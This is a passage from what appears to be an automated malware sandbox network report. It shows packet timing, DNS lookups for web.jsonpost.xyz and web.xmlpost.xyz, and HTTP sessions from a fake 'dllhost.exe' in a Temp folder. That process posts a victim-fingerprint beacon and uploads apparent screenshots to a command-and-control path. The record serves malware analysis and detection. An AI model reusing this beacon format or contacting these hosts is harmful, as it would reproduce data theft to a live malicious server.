                                                                                Nov 29, 2024 01:53:17.550339937 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.550384998 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.550451040 CET4988180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.670269012 CET804988172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.707875013 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.828000069 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.828078985 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.828219891 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.828286886 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.828366995 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.828418016 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.948421001 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.948539972 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.948549986 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.948638916 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.948687077 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.948697090 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.948707104 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.948769093 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.948838949 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.948847055 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.948934078 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.948967934 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.948976994 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.948985100 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.948997021 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:17.949053049 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:17.949053049 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:18.068615913 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.068763971 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:18.068870068 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.068881989 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.069006920 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:18.069067001 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.069195032 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:18.109736919 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.109853029 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:18.229850054 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.229949951 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:18.273714066 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.274127960 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:18.393712044 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.475166082 CET804988372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.479496956 CET4988380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:18.479757071 CET4988380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:18.481683016 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.482022047 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:18.583093882 CET4988980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:18.599634886 CET804988372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.703219891 CET804988972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.703468084 CET4988980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:18.703598976 CET4988980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:18.729672909 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.736809969 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:18.823477983 CET804988972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.829511881 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.831885099 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:18.856858969 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.951903105 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.951916933 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.952035904 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.952047110 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.952063084 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.952114105 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:18.952162027 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.068602085 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.068665028 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.102374077 CET4988880192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.222322941 CET804988872.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.364731073 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.484780073 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.484838963 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.484946966 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.485008955 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.485080957 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.485100031 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.604892969 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.605014086 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.605066061 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.605067968 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.605076075 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.605119944 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.605159044 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.605187893 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.605210066 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.605221033 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.605241060 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.605248928 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.605293036 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.605369091 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.605416059 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.605424881 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.605433941 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.605475903 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.605514050 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.605561018 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.725095987 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.725110054 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.725148916 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.725164890 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.725192070 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.725213051 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.725224018 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.769696951 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.769800901 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.885680914 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.885760069 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.887413979 CET804988972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.887473106 CET4988980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.887537003 CET4988980192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.933782101 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:19.934005976 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:19.956665039 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:20.003741980 CET4989580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:20.007972956 CET804988972.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:20.049778938 CET804989072.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:20.049853086 CET4989080192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:20.121496916 CET4989780192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:25.785430908 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:25.785542011 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:25.785552025 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:25.858375072 CET804991472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:25.858447075 CET4991480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:25.858565092 CET4991480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:25.892183065 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:25.892252922 CET4991380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:25.892405033 CET4991380192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:25.978398085 CET804991472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.012351036 CET804991372.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.054455996 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.174356937 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.174427032 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.175827026 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.175852060 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.175906897 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.176047087 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.295671940 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.295922995 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.295967102 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.295975924 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.296040058 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.296082973 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.296092033 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.296140909 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.296154976 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.296190023 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.296195030 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.296233892 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.296238899 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.296247959 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.296282053 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.296298981 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.296381950 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.296391010 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.296427011 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.296438932 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.416090012 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.416102886 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.416169882 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.416179895 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.416198015 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.416239977 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.457742929 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.457850933 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.577935934 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.579961061 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.625775099 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.745934963 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.747699976 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:26.949788094 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:26.949870110 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:27.116488934 CET804991472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:27.116604090 CET4991480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:27.116646051 CET4991480192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:27.167248964 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:27.167325020 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:27.222898006 CET4992180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:27.237763882 CET804991472.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:27.288592100 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:27.288722992 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:27.288877964 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:27.288887024 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:27.288896084 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:27.289026022 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:27.289036036 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:27.289043903 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:27.289191961 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:27.344084978 CET804992172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:27.344167948 CET4992180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:27.344398975 CET4992180192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:27.405345917 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:27.405410051 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:27.405443907 CET4991580192.168.2.472.52.178.23
                                                                                Nov 29, 2024 01:53:27.464520931 CET804992172.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:27.525463104 CET804991572.52.178.23192.168.2.4
                                                                                Nov 29, 2024 01:53:27.597306013 CET4992180192.168.2.472.52.178.23
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 29, 2024 01:52:03.935611010 CET | 192.168.2.4 | 1.1.1.1 | 0x14d3 | Standard query (0) | web.jsonpost.xyz | A (IP address) | IN (0x0001) | false
Nov 29, 2024 01:52:03.936781883 CET | 192.168.2.4 | 1.1.1.1 | 0x294 | Standard query (0) | web.xmlpost.xyz | A (IP address) | IN (0x0001) | false
Nov 29, 2024 01:52:09.060357094 CET | 192.168.2.4 | 1.1.1.1 | 0xa970 | Standard query (0) | web.xmlpost.xyz | A (IP address) | IN (0x0001) | false
Nov 29, 2024 01:52:13.816207886 CET | 192.168.2.4 | 1.1.1.1 | 0xbbb2 | Standard query (0) | web.xmlpost.xyz | A (IP address) | IN (0x0001) | false
Nov 29, 2024 01:52:18.818794012 CET | 192.168.2.4 | 1.1.1.1 | 0xba43 | Standard query (0) | web.xmlpost.xyz | A (IP address) | IN (0x0001) | false
Nov 29, 2024 01:52:23.861871958 CET | 192.168.2.4 | 1.1.1.1 | 0x985a | Standard query (0) | web.xmlpost.xyz | A (IP address) | IN (0x0001) | false
Nov 29, 2024 01:52:28.854682922 CET | 192.168.2.4 | 1.1.1.1 | 0x84c7 | Standard query (0) | web.xmlpost.xyz | A (IP address) | IN (0x0001) | false
Nov 29, 2024 01:52:33.816492081 CET | 192.168.2.4 | 1.1.1.1 | 0x4dd6 | Standard query (0) | web.xmlpost.xyz | A (IP address) | IN (0x0001) | false
Nov 29, 2024 01:52:38.894315004 CET | 192.168.2.4 | 1.1.1.1 | 0xcf | Standard query (0) | web.xmlpost.xyz | A (IP address) | IN (0x0001) | false
Nov 29, 2024 01:52:43.799405098 CET | 192.168.2.4 | 1.1.1.1 | 0x6aea | Standard query (0) | web.xmlpost.xyz | A (IP address) | IN (0x0001) | false
Nov 29, 2024 01:52:48.800633907 CET | 192.168.2.4 | 1.1.1.1 | 0x9278 | Standard query (0) | web.xmlpost.xyz | A (IP address) | IN (0x0001) | false
Nov 29, 2024 01:52:53.846334934 CET | 192.168.2.4 | 1.1.1.1 | 0x799a | Standard query (0) | web.xmlpost.xyz | A (IP address) | IN (0x0001) | false
Nov 29, 2024 01:52:58.799515009 CET | 192.168.2.4 | 1.1.1.1 | 0xcd72 | Standard query (0) | web.xmlpost.xyz | A (IP address) | IN (0x0001) | false
Nov 29, 2024 01:53:03.815944910 CET | 192.168.2.4 | 1.1.1.1 | 0x792b | Standard query (0) | web.xmlpost.xyz | A (IP address) | IN (0x0001) | false
Nov 29, 2024 01:53:08.815901995 CET | 192.168.2.4 | 1.1.1.1 | 0xb77d | Standard query (0) | web.xmlpost.xyz | A (IP address) | IN (0x0001) | false
Nov 29, 2024 01:53:13.799598932 CET | 192.168.2.4 | 1.1.1.1 | 0x5b94 | Standard query (0) | web.xmlpost.xyz | A (IP address) | IN (0x0001) | false
Nov 29, 2024 01:53:18.816462994 CET | 192.168.2.4 | 1.1.1.1 | 0xc19d | Standard query (0) | web.xmlpost.xyz | A (IP address) | IN (0x0001) | false
Nov 29, 2024 01:53:23.924268961 CET | 192.168.2.4 | 1.1.1.1 | 0x28d9 | Standard query (0) | web.xmlpost.xyz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 29, 2024 01:52:04.156912088 CET | 1.1.1.1 | 192.168.2.4 | 0x294 | Name error (3) | web.xmlpost.xyz | none | none | A (IP address) | IN (0x0001) | false
Nov 29, 2024 01:52:04.454211950 CET | 1.1.1.1 | 192.168.2.4 | 0x14d3 | No error (0) | web.jsonpost.xyz |  | 72.52.178.23 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 01:52:09.198055983 CET | 1.1.1.1 | 192.168.2.4 | 0xa970 | Name error (3) | web.xmlpost.xyz | none | none | A (IP address) | IN (0x0001) | false
Nov 29, 2024 01:52:13.954418898 CET | 1.1.1.1 | 192.168.2.4 | 0xbbb2 | Name error (3) | web.xmlpost.xyz | none | none | A (IP address) | IN (0x0001) | false
Nov 29, 2024 01:52:18.956420898 CET | 1.1.1.1 | 192.168.2.4 | 0xba43 | Name error (3) | web.xmlpost.xyz | none | none | A (IP address) | IN (0x0001) | false
Nov 29, 2024 01:52:24.000035048 CET | 1.1.1.1 | 192.168.2.4 | 0x985a | Name error (3) | web.xmlpost.xyz | none | none | A (IP address) | IN (0x0001) | false
Nov 29, 2024 01:52:28.995160103 CET | 1.1.1.1 | 192.168.2.4 | 0x84c7 | Name error (3) | web.xmlpost.xyz | none | none | A (IP address) | IN (0x0001) | false
Nov 29, 2024 01:52:33.953636885 CET | 1.1.1.1 | 192.168.2.4 | 0x4dd6 | Name error (3) | web.xmlpost.xyz | none | none | A (IP address) | IN (0x0001) | false
Nov 29, 2024 01:52:39.032515049 CET | 1.1.1.1 | 192.168.2.4 | 0xcf | Name error (3) | web.xmlpost.xyz | none | none | A (IP address) | IN (0x0001) | false
Nov 29, 2024 01:52:43.938195944 CET | 1.1.1.1 | 192.168.2.4 | 0x6aea | Name error (3) | web.xmlpost.xyz | none | none | A (IP address) | IN (0x0001) | false
Nov 29, 2024 01:52:48.938224077 CET | 1.1.1.1 | 192.168.2.4 | 0x9278 | Name error (3) | web.xmlpost.xyz | none | none | A (IP address) | IN (0x0001) | false
Nov 29, 2024 01:52:53.984343052 CET | 1.1.1.1 | 192.168.2.4 | 0x799a | Name error (3) | web.xmlpost.xyz | none | none | A (IP address) | IN (0x0001) | false
Nov 29, 2024 01:52:58.936994076 CET | 1.1.1.1 | 192.168.2.4 | 0xcd72 | Name error (3) | web.xmlpost.xyz | none | none | A (IP address) | IN (0x0001) | false
Nov 29, 2024 01:53:03.961301088 CET | 1.1.1.1 | 192.168.2.4 | 0x792b | Name error (3) | web.xmlpost.xyz | none | none | A (IP address) | IN (0x0001) | false
Nov 29, 2024 01:53:08.953022957 CET | 1.1.1.1 | 192.168.2.4 | 0xb77d | Name error (3) | web.xmlpost.xyz | none | none | A (IP address) | IN (0x0001) | false
Nov 29, 2024 01:53:13.937366009 CET | 1.1.1.1 | 192.168.2.4 | 0x5b94 | Name error (3) | web.xmlpost.xyz | none | none | A (IP address) | IN (0x0001) | false
Nov 29, 2024 01:53:18.955218077 CET | 1.1.1.1 | 192.168.2.4 | 0xc19d | Name error (3) | web.xmlpost.xyz | none | none | A (IP address) | IN (0x0001) | false
Nov 29, 2024 01:53:24.062901974 CET | 1.1.1.1 | 192.168.2.4 | 0x28d9 | Name error (3) | web.xmlpost.xyz | none | none | A (IP address) | IN (0x0001) | false
                                                                                • web.jsonpost.xyz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:04.581871033 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
Nov 29, 2024 01:52:04.581976891 CET | 156 | OUT | Data Ascii:
------1ecb6449b11250019f89ed10f8ec15d7
Content-Disposition: form-data; name="data"; filename="152122461226.jpg"
Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:04.582485914 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: web.jsonpost.xyz
Content-Length: 82
Cache-Control: no-cache
Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49732 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:06.264380932 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: web.jsonpost.xyz
Content-Length: 82
Cache-Control: no-cache
Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49733 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:06.452677965 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
Host: web.jsonpost.xyz
Content-Length: 98005
Cache-Control: no-cache
Nov 29, 2024 01:52:06.452703953 CET | 156 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49734 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:07.546147108 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: web.jsonpost.xyz
Content-Length: 82
Cache-Control: no-cache
Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49735 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:07.909174919 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
Host: web.jsonpost.xyz
Content-Length: 98005
Cache-Control: no-cache
Nov 29, 2024 01:52:07.909291983 CET | 156 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
